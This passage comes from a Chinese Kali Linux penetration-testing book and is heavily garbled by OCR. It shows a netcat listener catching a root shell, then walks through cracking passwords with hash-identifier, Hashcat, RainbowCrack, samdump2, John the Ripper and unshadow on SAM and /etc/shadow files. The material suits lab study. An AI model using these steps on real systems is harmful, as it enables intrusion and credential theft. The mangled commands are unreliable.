在 执行 payload 之 前 ， 我 们 还 要 在 测试 主机 上 启动 netcat 的 监听 服 
以 受理 被 测 主机 发 起 的 连接 。 
nc -VV -] -p 31337 
最 后 ， 我 们 在 被 测 主 机 上 运行 下 述 指令 。 
Jprivs 2390 
此 后 ， 我 们 可 在 测试 主机 上 看 到 图 10.6 所 示 的 信息 。 


root@kali:~# nc -v -l -p 31337 

nc: Listening on :: 31337 ... 

nc: listening on 0.0.0.0 31337 ... 

hc: connect to 192.168.56.101 31337 from 192.168.56.102 (192.168.56.102) 46060 [460 
50] 

whoami 

root 


wR 


RI 











图 10.6 
通过 whoami 指 令 ， 我 们 可 看 到 已 经 成 功 提 升 自身 权限 为 root 的 权 
IR. 


10.2 密码 攻击 
密码 是 当代 系统 验证 用 户 身份 的 主要 手段 。 只 要 某 人 能 够 递交 正确 








的 用 户 名 和 对 应 的 密码 ， 系 统 就 允许 这 个 人 登录 并 人 允许 他 使 用 该 账号 的 
所 有 资源 。 

构成 号 份 验证 的 要 素 可 分 为 三 大 类 。 

e 基于 所 知 (something you know) 。 这 类 认证 要 素 通常 被 称 为 身 
份 验证 的 第 一 要 素 。 密 码 就 属于 这 类 要 素 。 理 论 上 来 说 ， 只 有 特定 秘密 
的 持 有 人 才能 “知道 "有 关 秘 密 。 然 而 不 这 的 是 ， 这 类 信息 很 容易 外 沪 ， 
也 易于 被 他 人 获悉 。 因 此 ， 机 要 系统 应 当 采 取 其 他 方式 的 身份 验证 方 
ms 

e 基于 所 有 Csomethingyou have) 。 这 类 认证 要 素 通 党 被 称 为 身份 
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示 相 应 的 安全 持 有 物 后 ， 持 有 者 即 可 获得 登录 权 。 不 过 ， 持 有 物 〈 信 
A 可 被 复制 ， 所 以 这 种 身份 验证 方法 并 非 没 有 缺陷 。 

e 基于 特征 (something you are) 。 这 类 认证 要 素 通 常 被 称 为 身份 
验证 的 第 三 要 素 。 相 比 前 两 者 而 言 ， 这 类 信息 的 刁 份 验 证 方法 更 为 安 
全 。 然 而 ， 己 经 出 现 了 攻击 这 种 验证 方法 的 实际 案例 。 指 纹 识别 和 视 网 
膜 识 别 都 属于 验证 这 类 要 素 的 手段 。 

如 果 有 较 高 的 安全 需求 ， 就 应 当 验 证 一 个 以 上 的 验证 要 素 。 高 规格 
的 安全 系统 往往 验证 第 一 要 素 和 第 二 要 素 。 因 为 这 种 方法 验证 了 两 种 身 
份 验 证 要 素 ， 因 此 被 称 为 双 要 素 验 证 。 

然而 不 幸 的 是 ， 我 们 的 经 验 表 明 ， 目 前 多 数 系统 三 泛 依 赖 单一 的 密 
码 验证 。 作 为 渗透 测试 人 员 ， 您 应 当 在 测试 过 程 中 验证 密码 的 安全 性 。 

根据 攻击 方式 的 不 同 ， 密 人 码 攻击 可 分 为 以 下 几 类 。 

e 离线 攻击 : 这 种 攻击 手段 意 在 获取 目标 主机 上 的 密码 hash 文件 ， 
并 将 该 文件 复制 到 攻击 人 员 的 主机 。 此 后 ， 攻 击 人 员 就 可 使 用 密码 破解 
工具 破解 密码 文件 。 这 种 方法 的 优点 是 无 须 顾 及 被 测 主 机 上 的 密码 阻止 
策略 (账户 锁定 等 设置 ) ， 因 为 有 关 破 解 工作 是 在 攻击 人 员 的 主机 上 和 完 
成 的 。 












































e 在 线 攻击 : 如 果 采 用 这 种 方法 ， 攻 击 人 员 将 猜测 用 户 名 和 对 应 的 
密码 。 因 为 需要 多 次 猜 调 用 户 密码 ， 所 以 这 种 方式 因为 可 能 会 触 肥 账户 
锁定 等 保护 机 制 。 





10.2.1 离线 攻击 工具 

这 类 工具 用 于 实施 离线 密码 攻击 。 通 常情 况 下 ， 您 会 用 这 种 工具 破 
解 高 权限 账户 的 密码 ， 所 以 这 些 工具 往往 用 于 纵向 提 权 。 

既然 已 经 有 了 某 种 权限 的 账户 信息 ， 为 什么 还 需要 其 他 账户 的 登录 
HUE? 在 对 东 个 系统 进行 渗透 测试 时 ， 受 被 测 主机 配置 的 影响 ， 所 用 
账户 可 能 无 法 运行 茶 些 特定 的 应 用 程序 。 这 种 情况 下 ， 您 就 无 法 进行 下 
一 步 测 试 。 但 是 ， 如 果 使 用 利 规 用 户 身 份 登录 ， 您 就 可 以 正常 运行 那些 
程序 了 。 这 是 需要 获取 其 他 账 尸 信息 的 原因 之 一 。 

现在 的 主流 系统 在 存储 密码 的 时 候 都 只 保存 密码 的 hash《〈 哈 希 
值 ) 。 通 过 哈 希 算法 ， 密 码 可 被 转换 为 固定 长 度 的 消息 摘要 。 这 种 转换 
古人 不可逆 的 单 向 转换 。 所 谓 单 同 转换 是 指 ， 这 种 算法 可 将 既定 原始 值 轻 
松 地 转换 为 菜 个 哈 硕 ， 而 没有 实用 的 方法 可 以 从 蛤 希 值 逆向 推导 出 原始 
的 输入 值 。 

过 去 ， 计 算 机 系统 保存 密码 明文 。 如 果 攻 击 人 员 获 取 到 密码 文件 ， 
那么 他 束 获 取 了 全 部 的 密码 。 现 在 ， 即 使 攻击 人 员 获 取 了 密码 文件 ， 他 
们 也 只 能 获取 密码 的 哈 希 值 ， 还 是 无 法 轻易 获取 原始 密码 。 

密码 破解 是 以 穷 举 的 方式 做 哈 希 碰撞 。 如 果 所 测 密码 的 哈 希 值 与 文 
件 中 的 哈 希 值 相符 ， 就 意味 着 猜测 到 了 正确 的 密码 。 

在 利用 SQL 注入 漏洞 之 后 ， 测 试 人 员 就 可 导出 整个 数据 库 ， 继 而 可 
找到 密码 的 哈 希 值 。 离 线 破 解 工具 可 以 帮助 测试 人 员 从 哈 希 值 中 获取 记 
录 的 原始 信息 。 

在 一 次 渗透 测试 项 目 里 ， 我 们 导出 了 整个 数据 库 。 这 个 数据 里 存 有 
整个 E-mail 系 统 的 用 户 名 和 密码 。 借 助 这 些 信息 ， 我 们 以 东 个 关键 人 物 




















的 吴 份 登录 到 了 E-mail 系 统 ， 并 获取 了 各 种 机 要 系统 的 账户 信息 。 

1. hash-identifier 

aK LA AYA BS 4 RAY. AA AE ROAR SP TS is E 

法 ， 才 能 使 用 密码 破解 工具 破解 哈 硕 值 。 有 关 hash-identifier 程 序 能 够 文 
持 的 加 密 算 法 ， 请 参见 作者 的 官方 网 站 : http://code.google.com/p/hash- 
identifier/. 

假如 我 们 获取 了 下 述 哈 希 值 。 

d111b38c0e73bc867c4bad4023606a0e0df64c2f 

我 们 可 直接 使 用 hash-identifier 指 令 ， 并 在 HASH 值 字段 输入 哈 希 
值 。 有 具体 过 程 如 图 10.7 所 示 。 








root@kali:~# hash-identifier 
SEE AEA EEE EE REE EEE EEE EEE EEE EE EEE EE EE EE EH E AG 





# Ret P PEDEM E 
# FX NN X INN Fk. 0X & A # 
Gi X a, Os, a. uH eke A XC OK ONO # 
a +s § oJ. M re XX OON LUXUM X X MN X # 
# RR VN X XN XY N EI 
Li XXX VN X NX OR KN /\ AA AO F Li 
bi M. N.N NI IN / Y NEU! M / NM. f wllg 
Ei By Zion3R # 
Gi www.Blackploit.com # 
# Root@Blackploit.com # 
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HASH: d111b38cGe73bc867c4bad4023606a0e0d F64c2F 


Possible Hashs: 
[+] SHA-1 
[+] MySQL5 - SHA-1(SHA-1($pass) ) 





图 10.7 
述 信息 表明 这 个 值 是 SHA-1 型 的 哈 希 值 。 接 下 来 ， 我 们 可 以 使 用 
ud 哈 希 值 中 的 信息 。 
不 过 这 个 程序 的 可 靠 性 有 待 提高 。 我 们 可 能 会 遇 到 下 述 情况 。 
HASH: 8846f7eaee8fb117ad06bdd830b7586c 
Possible Hashs: 








[+] MD5 

[+] Domain Cached Credentials - MD4(MD4(($pass)). 

(strtolower($username))) 

即 ，hash-identifier 认为 这 个 值 属于 MDS 或 MD4 型 的 哈 希 。 不 过 
这 个 哈 希 是 经 NTLM 算 法 得 来 的 。 

2. Hashcat 

Hashcat 是 一 款 免费 的 多 线程 密码 破解 工具 。 目 前 ， 它 可 破解 80 种 
算法 Chttp://hashcat. net/hashcat/Zfeatures-algos) 的 哈 希 值 。Hashcat 程 
序 完全 依赖 CPU 运算 ， 它 要 比 利 用 GPU (Graphical Processing Unit) 运 
算 的 密码 破解 程序 要 慢 一 些 。 

Hastcat 文 持 6 种 攻击 模式 。 

e Straight: 程序 会 从 文本 文件 里 逐 行 读 取 数据 ， 并 把 这 些 数 据 当 作 
密码 的 备 选 值 。 这 是 默认 的 攻击 模式 ， 通 党 也 被 称 作 字典 式 攻击 模式 。 

e Combination (组 合 模 式 ) : Hashcat 将 会 把 字典 中 的 单词 进行 排 
列 组 合 ， 再 做 蛤 希 人 页 撞 。 例 如 ， 如 果 字 典 中 含有 以 下 单词 

o password 

o 01 

那么 Hashcat 将 会 尝试 的 密码 将 是 : 


© passwordpassword 








o password01 

o 01password 

o 0101 

e Toggle Case( 穷 举 大 小 写 组 合 ) : 程序 将 会 尝试 每 个 字典 单词 的 
各 种 大 小 写 组 合 。 

e Brute force (IRI : 程序 将 会 从 关键 字 空 间 中 取样 再 做 排 
列 组 合 。 这 种 攻击 模式 正在 被 mask attack 所 取代 。 例 如 ， 如 果 我 们 设 
定 程序 测试 A-Z 组 成 的 双 字 符 密码 ， 那 么 Hashcat 将 会 尝试 AA 到 ZZ 的 所 





有 英文 字符 组 合 。 

e Permutation 〈 排 列 组 合 ) : 对 于 字典 里 每 个 备 选 密码 ， 程 序 将 会 
按照 字符 进行 各 种 排列 组 合 。 例 如 ， 如 果 字 典 里 有 AB 这 个 备 选 密码 ， 
那么 Hashcat 将 会 测试 的 密码 如 下 : 

o AB 

o BA 

e  Table-lookup Cfi) : 程序 将 把 字典 里 每 个 备 选 密码 的 每 个 
字符 都 当 作 对 应 的 mask 进 行 处 理 。 这 是 一 种 自动 匹配 模式 的 穷 举 攻击 ， 
详细 情况 请 参见 http://hashcat. net/wiki/doku.php?id-table lookup attack. 

Hashcat 需 要 相应 的 字典 文件 。 您 可 从 下 述 链接 中 下 载 适 用 的 字 


e http://www.skullsecurity.org/wiki/index.php/Passwords. 

e http://cyberwarzone.com/cyberwarfare/password-cracking- 
megacollection-password-cracking- word-lists 。 

e http://hashcrack.blogspot.de/p/wordlist-downloads_29.html 

e http://packetstormsecurity.com/Crackers/wordlists/ 

e http://blog.g0tmi1k.com/2011/06/dictionaries-wordlists.html 

e http://www.md5decrypter.co.uk/downloads.aspx 

现在 开始 演示 Hashcat 的 适用 方法 。 

如 果 在 执行 Hashcat 的 时 候 指 定 --heljp 选 项 ， 您 将 看 到 Hashcat 的 帮助 
信息 。 我 们 可 通过 这 些 帮 助 信息 碍 看 各 个 选项 的 使 用 方法 。 

假设 我 们 获取 了 文件 名 为 testhash 的 密码 文件 ， 并 从 中 找到 了 下 述 
哈 希 值 。 

5f4dcc3b5aa765d61d8327deb882cf99 

我 们 可 使 用 rockyou.txt 文 件 作 为 Hashcat 的 密码 字典 。 简 便 起 见 ， 我 
们 可 把 密码 文件 和 字典 文件 放 在 同一 个 目录 下 。 用 pwd 指 令 查 看 当前 日 
录 的 目录 名 。 





然后 我 们 通过 下 述 指令 ， 令 Hashcat 以 默认 的 攻击 方式 测试 密码 。 
hashcat -m 100 test.hash rockyou.txt 

其 中 ， 选 项 -m 100 指定 了 hash 的 类 型 为 SHA-1。 

我 们 可 看 到 图 10.8 所 示 的 信息 。 


root@kali:~/pwd# hashcat -m 100 test .hash rockyou.txt 
Initializing hashcat v0.44 by atom with 8 threads and 32mb segment-size... 





Added hashes from file test.hash: 1 (1 salts) 
Activating quick-digest mode for single-hash 


NOTE: press enter for status-screen 





H111b38c0e73bc867c4bad4023606a0e0df64c2f :password01 
All hashes have been recovered 


图 10.8 
述 信息 表明 ， 程 序 成 功 的 破解 了 该 哈 希 值 。 即 ， 密 码 原文 是 
password01. 

默认 攻击 模式 的 破解 速度 比较 快 。 如 果 密 码 字 — 典 没有 命中 正确 的 密 
人 码 ， 您 就 需要 尝试 其 他 的 攻击 模式 。 

Hashcat 系 列 有 很 多 密码 破解 工具 。 其 中 部 分 程序 可 以 使 用 GPU 破 
fuh. 所 以 只 要 您 的 电脑 装 有 兼容 的 GPU， 那 么 破解 速度 还 是 相当 理 
想 的 。 请 注意 ， 无 法 在 VM 虚拟 机 里 使 用 基于 GPU 破 解 的 程序 ， 因 为 在 
虚拟 机 里 运行 的 程序 无 法 直接 调用 物理 主机 的 人 硬件。 此外， 显卡 的 兼容 
性 也 很 重要 。 要 使 用 基于 GPU 运算 的 破解 程序 ， 您 的 显卡 需要 文 持 
CUDA (NVidia) OpenCL (AMD) 技术 。 在 Hashcat 系 列 里 ， 支 持 基 
于 GPU 运算 的 破解 程序 有 下 面 几 下 。 

e  oclhashcatite: 它 是 一 黎 基 于 GPU 运算 的 密码 人 破解 程序 。 在 
Hashcat 系列 工具 里 ， 它 算得 上 是 速度 最 快 的 破解 工具 。 不 过 它 文 持 的 
哈 希 算法 有 限 ( 约 30 种 ) ， 而 且 只 文 持 markov、brute force 和 mask 模式 
的 密码 攻击 。 

e oclhashcat-plus: 它 是 一 球 基 于 GPU 运算 的 密码 破解 程序 ， 文 持 

















多 数 哈 希 算法 。 这 个 程序 针对 字典 式 攻 击 进行 了 各 种 优化 ， 可 同时 破解 
多 个 哈 希 值 。oclhashcat-plus 工具 支持 的 攻击 模式 有 brute foce 〈 以 mask 
attack 模式 实现 ) 、combinator attack, dictionary attack. hybrid attack, 
mask attack 和 基于 规则 的 攻击 。 

如 需 详 细 了 解密 码 字典 的 有 关 情 况 ， 

e Hybrid attack dpud dad php?id-hybrid attack) 

e Mask attack Chttp://hashcat.net/wiki/doku. php?id-mask., attack) 

e Rule-basedattack Chttp://hashcat.net/wiki/doku. php? 
id-rule based attack) 

3. RainbowCrack 

彩虹 表 破 解 CRainbowCrack) 是 利用 彩虹 表 来 破解 哈 希 数据 的 工 
县 。 它 实现 了 由 Philippe Oechslin 提 倡 的 “以 空间 换 时 间 ” 的 技术 思想 。 

如 需 详细 了 解 这 种 技术 ， 请 参见 Philippe Oechslin 的 论文 Making 
aFaster Cryptanalytic Time-Memory Trade-Off: http://lasec.epfl. 
ch/pub/lasec/doc/Oech03.pdf 
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的 备 选 值 《字典 里 的 密码 ) 的 哈 希 值 ， 然 后 再 将 计算 出 来 的 哈 希 值 与 获 
取 到 的 哈 希 值 进行 对 比 。 如 果 这 两 个 值 相等 ， 则 可 确定 哈 希 值 的 原始 内 
容 即 是 密码 ; 否则 就 说 明 密 人 码 不 正确 。 

彩虹 表 破 解法 的 效率 也 高 于 暴力 破解 法 。 这 是 因为 暴力 破解 法 必须 
计算 字典 内 容 的 哈 希 值 ， 然 后 进行 匹配 。 而 使 用 “以 空间 换 时 间 ” 技 术 的 

彩虹 表 破 解法 ， 事 先 就 计算 好 了 字典 各 项 的 哈 希 值 ， 破 解 过 程 只 是 简单 
的 数值 比较 ， 所 以 效率 更 高 。 

请 注意 : RainbowCrack 程 序 速度 不 快 ， 而 且 不 支持 多 线程 。 人 们 已 
经 修改 了 这 个 程序 ， 使 之 文 持 多 线程 技术 和 部 分 显卡 采用 的 CUDA ix 
术 。 读 者 可 从 下 列 地 址 下 载 这 个 改进 版 的 rcrack 的 程序 : https://www. 


freerainbowtables.com/en/download/. 


























Kali Linux 收 录 了 RainbowCrack 的 三 大 工具 。 在 破解 哈 希 时 ， 您 必 
须 依次 使 用 这 些 工 具 。 

e rtgen: 生成 彩虹 表 的 程序 。 生 成 彩虹 表 的 计算 过 程 也 被 称 为 彩虹 
表 的 预计 算 阶 段 。 彩 虹 表 包含 字典 、 哈 希 值 、 哈 希 算法 、 字 符 集 以 及 字 
典 的 长 度 范 围 。 彩 虹 表 的 预计 算 相 当 费 时 。 但 是 生成 彩虹 表 之 后 ， 彩 虹 
表 破 解法 将 比 暴 力 破解 法 的 效率 要 高 上 不 少 。rtgen 程序 文 持 的 算法 有 
LanMan. NTLM, MD2. MD4、 MD5、SHA1 以 及 RIPEMD160。 

e rtsort: 对 rtgen 生成 的 彩虹 表 进 行 排序 的 工具 。 

ercrack: 利用 彩虹 表 碍 找 哈 希 值 的 工具 。 

如 需 局 动 生 成 彩虹 表 的 rtgen 工 具 ， 可 在 终端 窗口 中 执行 下 述 指令 。 

# rtgen 

上 述 指令 将 会 显示 简单 的 使 用 说 明 ， 以 及 两 个 指令 范例 。 

本 例 将 使 用 这 个 程序 制作 两 个 彩虹 表 ， 并 使 其 符合 下 述 要 求 。 

e hash algorithm 〈 算 法 ) : md5 

e charset 《字符 集 ) : loweralpha 





e plaintext_len_min: 1 

e plaintext_lan_max: 5 

e rainbow table index: 0 

e rainbow chain length: 2000 

e rainbow chain count: 8000 

e part index: 0 

依照 以 上 要 求 ， 制 作 第 一 个 彩虹 表 所 需 的 指令 如 下 所 示 。 
# rtgen md5 loweralpha 1 5 0 2000 8000 testing 

此 后 ， 屏 幕 上 会 显示 图 10.9 所 示 的 信息 。 





root@kali:~# rtgen md5 loweralpha 1 5 O 2000 8000 6 

rainbow table md5 loweralphafl-5 © 2000x8000 O.rt parameters 
hash algorithm: md5 

hash length: 16 

charset : abcdefghijklmnopqrstuvwxyz 

charset in hex: 61 62 63 64 65 66 67 68 69 6a 6b 6c 6d 6e 6f 70 71 72 73 74 75 7 
6 77 78 79 7a 

charset length: 26 

plaintext length range: 1 - 5 

reduce offset: 0x00000000 

plaintext total: 12356630 

sequential starting point begin from © (0x0000000000000000) 
generating... 





000 of 8000 rainbow chains generated (0 m 10.2 s) 





图 10.9 
第 一 个 彩虹 表 的 文件 名 为 md5_loweralpha#1-5_0_2000x8000_0.rt， 
并 被 保存 在 目录 /sr/share/rainbowcrack/ 之 下 。 





制作 第 二 个 彩虹 表 所 需 的 指令 如 下 所 示 。 

# rtgen md5 loweralpha 1 5 1 2000 8000 0 

在 作者 的 系统 中 ， 生 成 上 述 两 个 彩虹 表 总 耗 时 为 3 分 钟 左 右 。 第 二 
个 彩虹 表 被 保存 为 md5_loweralpha#1-5_1_2000x8000_0.rt 文 件 。 

请 注意 ， 彩 虹 表 的 制作 过 程 十 分 耗 时 ， 而 且 彩 虹 表 文件 非常 大 。 如 
果 需 要 估算 彩虹 表 的 耗 时 情况 ， 可 使 用 Winrtgen Chttp://www.oxid.it/ 
downloads/winrtgen.zip ) 程序 。 

Winrtgen 是 Windows 的 应 用 程序 。 奋 要 在 Kali Linux isr E, W 
需要 使 用 Wine 环 境 。 

如 果 不 想 上 自己 制作 彩虹 表 ， 您 可 以 从 网 上 下 载 一 些 现 成 的 彩虹 表 。 
例如 ， 下 述 网 站 就 提供 了 彩虹 表 下 载 服 务 : 

e http://www.freerainbowtables.com/en/tables/; 


e http://rainbowtables.shmoo.com/. 


Winrtgen 程 序 的 图 形 界 面 如 图 10.10 所 示 。 





= 


p 


Key space: 12355530 keys 
Disk space: 250 KB (125 KB each table) 
Success probability: 0.864161 (86.42%) 

m Benchmark 
Hash speed 1566415 hash/sec 
Step speed 1145737 step/sec 
Table precomputation time: 13.9648 seconds 
Total precomputation time: 27.9296 seconds 
Max cryptanalysis time: 3.4912 seconds 


Benchmark | 











图 10.10 

rtsort 

制作 彩虹 表 之 后 ， 应 当 对 其 进行 排序 。 此 时 可 选用 rtsort 程 序 。 

知 要 在 指令 行 中 局 动 rtsort 程 序 ， 可 在 终端 中 执行 下 述 指令 。 

# rtsort 

上 述 指令 将 会 显示 简单 的 使 用 说 明 以 及 指令 范例 。 在 本 例 中 ， 我 们 
将 通过 下 述 指令 对 第 一 个 彩虹 表 进 行 排序 。 

# rtsort md5_loweralpha#1-5_0_2000x8000_0.rt 

md5_loweralpha#1-5_0_2000x8000_0.rt: 

1176928256 bytes memory available 

loading rainbow table... 

sorting rainbow table by end point... 


writing sorted rainbow table... 


然后 ， 采 取 相 同 的 操作 对 第 二 个 彩虹 表 进 行 排序 。 

# rtsort md5_loweralpha#1-5_1_2000x8000_0.rt 
md5_loweralpha#1-5_1_2000x8000_0.rt: 

1177255936 bytes memory available 

loading rainbow table... 

sorting rainbow table by end point... 

writing sorted rainbow table... 

rtsort LH. HAAR AY AY RI sis ERC o 

在 rtsort 程 序 的 运行 期 间 ， 请 耐心 等 竺 程序 结束 。 切 幻 中 断 程 序 ， 合 





则 将 会 破坏 彩虹 表 文 件 。 


接 下 来 ， 我 们 将 使 用 5 个 字符 字典 的 彩虹 表 碰 撞 〈 破 解 ) 密码 的 


MD5 哈 希 值 。 请 注意 ， 因 为 我 们 使 用 了 两 个 彩虹 表 ， 所 以 成 功率 大 约 为 
8696. 





rcrack 

要 在 指令 行 中 局 动 rcrack 程 序 ， 可 在 终端 中 执行 下 述 指令 。 

# rcrack 

上 述 指令 将 会 在 屏幕 上 显示 简单 的 使 用 说 明 以 及 指令 范例 。 

本 次 将 破解 abcde 的 MD5 散 列 值 ab56b4d 





92b40713acc5af89985d4b786。 


# rcrack /usr/share/rainbowcrack/*.rt -h 
ab56b4d92b40713acc5af89985d4b786 
上 述 指令 的 运行 结果 如 图 10.11 所 示 。 





bytes memory available 
x 128000 bytes memory allocated for table buffer 
2060 bytes memory allocated for chain traverse 

disk: /usr/share/rainbowc rack/md5_lLoweralpha#1-5 © 2000x8000 0.rt: 128000 bytes read 
disk: /usr/share/rainbowcrack/md5 loweralphafl-5 1 2060x8000 0.rt: 128000 bytes read 
searching for 1 hash... 

laintext of ab56b4d92b40713acc5af89985d4b786 is abcde 

isk: thread aborted 


statistics 
laintext found: i gr 
otal time: 2.07 s 
time of chain traverse: 1.88 s 
time of alarm check: 0.16 s 
time of wait: 0.00 s 
time of other operation: 0.03 s 
time of disk read: 0.00 s 
m & reduce calculation of chain traverse: 1998000 
ash & reduce calculation of alarm check: 208984 
number of alarm: 704 
peed of chain traverse: 1.06 million/s 
peed of alarm check: 1.28 million/s 


result 


b56b4d92b40713acc5af89985d4b786 abcde hex:6162636465 
图 10.11 


上 述 结果 表明 ，rcrack 程 序 成 功 地 破解 (碰撞 ) 了 给 定 哈 希 值 的 明 
文 。 整 个 破解 过 程 的 耗 时 大 约 为 2 秒 。 

rcrack 的 改进 版 本 叫做 rcracki_mt Chttps://www.freerain bowtables. 
com/en/download/) 。 改 进 版 文 持 混合 (hybrid) 和 索引 Cindexed) 
表 ， 并 且 采 用 了 多 线程 技术 。 

4. samdump2 

Windows 2K/NT/XP/Vista 系统 的 账户 密码 ， 以 哈 希 值 的 形式 储存 于 
SAM 的 文件 型 数据 库 里 。 
samdunip2 Chttp://sourceforge.net/projects/ophcrack/files/samdump2/) 可 
破解 这 种 哈 希 。 无 需 SysSKey (System Key) , samdump2 程序 就 可 破解 

密码 的 哈 希 值 。SysKey 是 由 Windows NT Service Pack 3 引入 的 概念 ， 它 

是 保护 Windows SAM 数 据 库 的 加 密 密 钥 。 

如 需 启 动 samdump2， 可 在 命令 行 中 输入 如 下 命令 。 








# Samdump2 

上 述 指令 将 会 显示 简单 的 使 用 说 明 。 

获取 Windows 密 码 哈 希 值 的 方法 有 很 多 。 

e 第 一 种 方法 : 直接 使 用 samdump2 程序 分 析 Windows 系统 和 SAM 
文件 。 有 关 信 息 都 保存 在 。 ”ci\%windows%\system32\config 目 录 下 。 不 
过 ， 在 Windows 运 行 期 间 ， 该 目录 被 锁定 保护 。 所 以 ， 可 通过 Linux 
Live CD《〈 例 如 Kali Linux) 局 动 计算 机 系统 ， 然 后 挂 在 Windows 系统 的 
磁盘 分 区 。 在 此 之 后 ， 您 就 可 以 把 Windows 的 SAM 文 件 复 制 到 Kali 主 机 
Js 

e 第 二 种 方法 : 使 用 pwdump 程 序 或 同类 型 的 相关 工具 把 Windows 账 
户 的 密码 哈 希 值 导出 来 。 

e 第 三 种 方法 : 参见 上 一 章 Meterpreter 脚本 的 使 用 方法 ， 再 执行 
hashdump 命 令 把 密码 的 哈 希 值 寻 出来。 使 用 这 种 方法 的 前 提 是 您 首先 要 
成 功利 用 好 主机 的 漏洞 ， 并 能 够 上 传 Meterpreter 的 脚本 。 

下 一 步 ， 我 们 将 演示 Windows XP SP3 密码 的 破解 方法 。 假 设 您 已 
经 取得 system 和 sam 文 件 ， 将 它们 以 同文 件 名 保存 在 home 目 录 下 ， 那 么 
破解 哈 希 值 的 命令 如 下 所 示 。 

# Samdump2 system sam -o test-sam 

通过 上 述 指令 ， 我 们 把 samdump2 的 输出 结果 保存 为 文件 test-sam。 
这 个 文件 的 内 容 如 下 所 示 。 

Administrator:500:e52cac67419a9a22c295285c92cd06b4:b2641aea8eb4 
d2b7c78f6fb::: 

Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73 
9c0::: 

HelpAssistant:1000:383b9c42d9d1900952ec0055e5b8eb7b:0b742054bd 
12b10982360b::: 

SUPPORT_388945a0:1002:aad3b435b51404eeaad3b435b51404ee:ald6 








a9ddd414755019a::: 

tedi:1003:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73«c 
9c0::: 

接 下 来 就 可 以 用 密码 破解 工具 破解 test-sam 文 件 的 哈 希 值 。 您 可 以 
选用 下 文 介绍 的 John 和 Ophcrack。 

5. John 

John the Ripper/John (Chttp://www.openwall.com/john/) z&-— 3X 8i fif 
密码 哈 希 的 工具 。 目 前 ， 这 款 工具 可 以 破解 40 ”多 种 类 型 的 密码 哈 希 。 
它 可 破解 常见 的 DES, MD5, LM, NT, crypt, NETLMÑINETNTLM 
型 哈 希 。 虽 然 破解 哈 希 的 软件 有 很 多 ， 但 是 DES 和 crypt 型 哈 希 的 破解 功 
能 使 John 成 为 一 枝 独 郁 。 

如 需 局 动 John 程 序 ， 可 在 终端 中 使 用 下 述 指令 。 

# john 

上 述 指令 将 会 在 屏幕 上 显示 简单 的 使 用 说 明 。 

John 的 密码 破解 模式 分 为 以 下 4 种 。 

e 字典 模式 (Wordlist mode) : 在 这 种 模式 下 ， 用 户 只 需要 提供 字 
典 文 件 (wordlist〉 束 可 以 破解 密码 文件 。 字 典 文件 是 包含 密码 备 选 值 
的 文本 文件 ， 文 件 中 的 每 行内 容 都 将 被 当 作 一 个 用 来 进行 碰撞 测试 的 候 
选 密码 。 这 种 模式 具备 “ 字 词 变化 ”( 束 是 某 种 规则 〉 的 功能 ，〈 这 种 规 
WW) 可 上 自动 套用 在 每 行 的 备 选 密码 中 ， 以 提高 破解 的 概率 。--wordlist= 
<wordlist 。 ”name> 选项 用 于 指定 字典 文件 。 这 种 字典 可 以 是 您 自己 制作 
的 字典 ， 也 可 以 是 他 人 制作 的 字典 。 许 多 网 站 都 提供 字典 下 载 。 例 如 ， 
Openwall Project (John 的 官方 网 站 ) 就 提供 字典 下 载 服务 ， 详 情 请 参见 
http://download. openwall.net/pub/wordlists/. 

e 简易 破解 模式 〈Single crack mode) : 这 是 John 程 序 作者 推荐 的 应 
当 首 先 尝 试 的 破解 模式 。 在 这 种 模式 下 ，John 会 使 用 登录 名 、 全 名 和 用 
户 的 home 文 件 夹 名 作为 测试 的 候选 密码 ， 并 使 用 候选 密码 来 碰撞 CN 























解 ) 相应 账户 的 密码 ， 或 者 破解 使 用 相同 salt 加 密 的 密码 哈 硕 。 就 结果 
而 言 ， 这 种 模式 比 字 典 模式 要 快 得 多 。 

e 增强 型 破解 模式 (Incremental mode) : 这 种 模式 是 John 各 种 模 
式 里 功能 最 强大 的 破解 模式 ， 它 会 尝试 所 有 可 能 的 密码 组 合 。 不 过 ， 如 
果 用 户 不 设置 密码 的 测试 区 间 ， 程 序 将 会 非常 耗 时 。 测 试 区 间 由 密码 长 
度 的 上 限 和 字符 集 的 设置 构成 。 要 这 种 破解 模式 破解 密码 ， 必 须 指定 相 
应 的 破解 模块 。 程 序 预 设 的 模块 有 All、Alnum 〈 字 母 和 数字 ) 、 

Alpha CRI) . Digits (数字 ) 和 Lanman; 您 也 可 以 根据 实际 需要 上 自 
定义 一 个 测试 模块 。 

e 外 部 模式 (External mode) : 在 这 种 模式 下 ， 用 户 可 以 指定 John 
程序 使 用 外 部 〈 源 ) 程序 破解 密码 。 如 需 使 用 这 种 模式 ， 您 首先 应 在 配 
置 文件 里 创建 一 个 [List.External:MODE] 的 节点 (section) 。 其 中 ， 
MODE 束 是 这 种 模式 的 一 个 (任意 ) 名 字 ， 而 这 个 节点 的 内 容 应 当 是 C 
语言 编写 的 生成 候选 密码 的 各 种 函数 。 以 这 种 模式 启动 程序 之 后 ，John 
会 编译 这 个 节点 内 的 源 代码 ， 并 使 用 它 进行 密码 人 破解。 如 需 了 解 更 多 信 
息 ， 可 访问 John 的 官方 网 站 : 
http://www.openwall.com/john/doc/EXTERNAL.shtml. 

如 采 没 有 明确 指定 John 的 破解 模式 ， 它 将 会 按 默 认 顺 序 进 行 破解 : 
和 站 先 采 用 简易 破解 模式 ， 然 后 尝试 字典 式 人 破解 ， 最 后 进行 增强 式 人 破解。 

在 使 用 John 程 序 之 前 ， 您 首先 需要 拿 到 包含 密码 信息 的 哈 希 文件 。 
UNIX 一 类 的 操作 系统 ， 和 密码 哈 希 多 数 都 保存 在 shadow 文 件 和 passwd 文 
件 里 。 男 外 ， 只 有 root 级 别 的 用 户 才能 要 读 取 shadow 文 件 。 

在 获取 密码 信息 文件 之 后 ， 您 需要 对 这 些 文件 做 一 些 处 理 ; 人 否则 
John 无 法 破解 其 中 的 哈 希 。 好 在 John 提 供 的 unshadow 程 序 可 进行 这 种 处 
理 。 

我 从 Metasploitable2 的 虚拟 机 中 提取 出 /etc/shadow 和 /etc/passwd， 然 
后 把 它们 放 在 同一 个 目录 里 ， 并 分 别 重 命名 为 etc-shadow 和 etc-passwd。 




















然后 ， 我 使 用 下 述 指令 将 shadow 和 passwd 文 件 进 行 合 并 处 理 。 
# unshadow etc-passwd etc-shadow > pass 
以 下 是 pass 文 件 的 部 分 内 容 。 
